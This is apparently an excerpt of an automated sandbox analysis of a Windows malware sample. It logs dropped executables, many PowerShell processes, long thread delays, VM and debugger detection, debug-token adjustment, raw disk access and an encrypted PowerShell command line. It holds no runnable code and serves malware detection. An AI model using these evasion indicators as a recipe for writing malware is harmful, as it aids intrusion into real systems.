Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep count: 36 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3404	Thread sleep count: 1488 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7884	Thread sleep time: -31400s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 6720	Thread sleep time: -126780s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7888	Thread sleep time: -96000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5196	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep count: 2896 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep count: 332 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep count: 2732 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep count: 355 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080	Thread sleep count: 3655 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080	Thread sleep count: 154 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep count: 3873 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348	Thread sleep count: 634 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884	Thread sleep count: 5074 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep count: 292 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016	Thread sleep count: 1013 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 776	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF2E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

33_2_06CF2E2C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF72F5 GetSystemInfo,wsprintfA,

33_2_06CF72F5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf{G
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`"
Source: KL-3.1.16.exe, 00000000.00000002.2236961119.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\KL-3.1.16.exe	API call chain: ExitProcess graph end node	graph_0-3250
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	API call chain: ExitProcess graph end node	graph_2-24901
Source: C:\ProgramData\Program\iusb3mon.exe	API call chain: ExitProcess graph end node	graph_33-35423

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Code function: 0_2_00007FF6F9253240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6F9253240

Source: C:\Users\user\Desktop\KL-3.1.16.exe

0_2_00007FF6F9255D98

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00C1817A mov eax, dword ptr fs:[00000030h]	33_2_00C1817A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00C0DB1C mov ecx, dword ptr fs:[00000030h]	33_2_00C0DB1C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04EC00CD mov eax, dword ptr fs:[00000030h]	33_2_04EC00CD

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_000000018003A8E4 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

2_2_000000018003A8E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\KL-3.1.16.exe	Code function: 0_2_00007FF6F9253240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6F9253240
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Code function: 0_2_00007FF6F9252680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6F9252680
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Code function: 0_2_00007FF6F92542FC SetUnhandledExceptionFilter,	0_2_00007FF6F92542FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E0D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018001E0D0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002BB84 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018002BB84
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003A484 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000000018003A484
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00C0A8ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00C0A8ED
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00C06340 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00C06340
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CFD0C2 SetUnhandledExceptionFilter,	33_2_06CFD0C2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CFD0B0 SetUnhandledExceptionFilter,	33_2_06CFD0B0

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

